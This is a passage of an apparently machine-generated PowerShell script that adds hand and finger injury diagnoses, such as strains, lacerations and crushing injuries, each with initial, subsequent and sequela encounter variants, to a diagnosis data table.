at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of other finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of other finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of other finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of other finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of other finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of other finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of other finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of other finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of other finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of other finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of other finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of other finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of other finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of other finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of other finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of other finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of other finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of other finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level","Other injury of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles, fascia and tendons at wrist and hand level, right hand","Unspecified injury of other specified muscles, fascia and tendons at wrist and hand level, right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles, fascia and tendons at wrist and hand level, right hand","Unspecified injury of other specified muscles, fascia and tendons at wrist and hand level, right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles, fascia and tendons at wrist and hand level, right hand","Unspecified injury of other specified muscles, fascia and tendons at wrist and hand level, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles, fascia and tendons at wrist and hand level, left hand","Unspecified injury of other specified muscles, fascia and tendons at wrist and hand level, left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles, fascia and tendons at wrist and hand level, left hand","Unspecified injury of other specified muscles, fascia and tendons at wrist and hand level, left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles, fascia and tendons at wrist and hand level, left hand","Unspecified injury of other specified muscles, fascia and tendons at wrist and hand level, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand","Unspecified injury of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand","Unspecified injury of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand","Unspecified injury of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles, fascia and tendons at wrist and hand level, right hand","Strain of other specified muscles, fascia and tendons at wrist and hand level, right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles, fascia and tendons at wrist and hand level, right hand","Strain of other specified muscles, fascia and tendons at wrist and hand level, right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles, fascia and tendons at wrist and hand level, right hand","Strain of other specified muscles, fascia and tendons at wrist and hand level, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles, fascia and tendons at wrist and hand level, left hand","Strain of other specified muscles, fascia and tendons at wrist and hand level, left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles, fascia and tendons at wrist and hand level, left hand","Strain of other specified muscles, fascia and tendons at wrist and hand level, left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles, fascia and tendons at wrist and hand level, left hand","Strain of other specified muscles, fascia and tendons at wrist and hand level, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand","Strain of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand","Strain of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand","Strain of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles, fascia and tendons at wrist and hand level, right hand","Laceration of other specified muscles, fascia and tendons at wrist and hand level, right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles, fascia and tendons at wrist and hand level, right hand","Laceration of other specified muscles, fascia and tendons at wrist and hand level, right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles, fascia and tendons at wrist and hand level, right hand","Laceration of other specified muscles, fascia and tendons at wrist and hand level, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles, fascia and tendons at wrist and hand level, left hand","Laceration of other specified muscles, fascia and tendons at wrist and hand level, left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles, fascia and tendons at wrist and hand level, left hand","Laceration of other specified muscles, fascia and tendons at wrist and hand level, left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles, fascia and tendons at wrist and hand level, left hand","Laceration of other specified muscles, fascia and tendons at wrist and hand level, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand","Laceration of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand","Laceration of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand","Laceration of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other specified muscles, fascia and tendons at wrist and hand level, right hand","Other injury of other specified muscles, fascia and tendons at wrist and hand level, right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other specified muscles, fascia and tendons at wrist and hand level, right hand","Other injury of other specified muscles, fascia and tendons at wrist and hand level, right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other specified muscles, fascia and tendons at wrist and hand level, right hand","Other injury of other specified muscles, fascia and tendons at wrist and hand level, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other specified muscles, fascia and tendons at wrist and hand level, left hand","Other injury of other specified muscles, fascia and tendons at wrist and hand level, left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other specified muscles, fascia and tendons at wrist and hand level, left hand","Other injury of other specified muscles, fascia and tendons at wrist and hand level, left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other specified muscles, fascia and tendons at wrist and hand level, left hand","Other injury of other specified muscles, fascia and tendons at wrist and hand level, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand","Other injury of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand","Other injury of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand","Other injury of other specified muscles, fascia and tendons at wrist and hand level, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle, fascia and tendon at wrist and hand level, right hand","Unspecified injury of unspecified muscle, fascia and tendon at wrist and hand level, right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle, fascia and tendon at wrist and hand level, right hand","Unspecified injury of unspecified muscle, fascia and tendon at wrist and hand level, right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle, fascia and tendon at wrist and hand level, right hand","Unspecified injury of unspecified muscle, fascia and tendon at wrist and hand level, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle, fascia and tendon at wrist and hand level, left hand","Unspecified injury of unspecified muscle, fascia and tendon at wrist and hand level, left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle, fascia and tendon at wrist and hand level, left hand","Unspecified injury of unspecified muscle, fascia and tendon at wrist and hand level, left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle, fascia and tendon at wrist and hand level, left hand","Unspecified injury of unspecified muscle, fascia and tendon at wrist and hand level, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand","Unspecified injury of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand","Unspecified injury of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand","Unspecified injury of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle, fascia and tendon at wrist and hand level, right hand","Strain of unspecified muscle, fascia and tendon at wrist and hand level, right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle, fascia and tendon at wrist and hand level, right hand","Strain of unspecified muscle, fascia and tendon at wrist and hand level, right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle, fascia and tendon at wrist and hand level, right hand","Strain of unspecified muscle, fascia and tendon at wrist and hand level, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle, fascia and tendon at wrist and hand level, left hand","Strain of unspecified muscle, fascia and tendon at wrist and hand level, left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle, fascia and tendon at wrist and hand level, left hand","Strain of unspecified muscle, fascia and tendon at wrist and hand level, left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle, fascia and tendon at wrist and hand level, left hand","Strain of unspecified muscle, fascia and tendon at wrist and hand level, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand","Strain of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand","Strain of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand","Strain of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle, fascia and tendon at wrist and hand level, right hand","Laceration of unspecified muscle, fascia and tendon at wrist and hand level, right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle, fascia and tendon at wrist and hand level, right hand","Laceration of unspecified muscle, fascia and tendon at wrist and hand level, right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle, fascia and tendon at wrist and hand level, right hand","Laceration of unspecified muscle, fascia and tendon at wrist and hand level, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle, fascia and tendon at wrist and hand level, left hand","Laceration of unspecified muscle, fascia and tendon at wrist and hand level, left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle, fascia and tendon at wrist and hand level, left hand","Laceration of unspecified muscle, fascia and tendon at wrist and hand level, left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle, fascia and tendon at wrist and hand level, left hand","Laceration of unspecified muscle, fascia and tendon at wrist and hand level, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand","Laceration of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand","Laceration of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand","Laceration of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle, fascia and tendon at wrist and hand level, right hand","Other injury of unspecified muscle, fascia and tendon at wrist and hand level, right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle, fascia and tendon at wrist and hand level, right hand","Other injury of unspecified muscle, fascia and tendon at wrist and hand level, right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle, fascia and tendon at wrist and hand level, right hand","Other injury of unspecified muscle, fascia and tendon at wrist and hand level, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle, fascia and tendon at wrist and hand level, left hand","Other injury of unspecified muscle, fascia and tendon at wrist and hand level, left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle, fascia and tendon at wrist and hand level, left hand","Other injury of unspecified muscle, fascia and tendon at wrist and hand level, left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle, fascia and tendon at wrist and hand level, left hand","Other injury of unspecified muscle, fascia and tendon at wrist and hand level, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand","Other injury of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand","Other injury of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand","Other injury of unspecified muscle, fascia and tendon at wrist and hand level, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified thumb","Crushing injury of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified thumb","Crushing injury of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified thumb","Crushing injury of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right thumb","Crushing injury of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right thumb","Crushing injury of right thumb, subsequent 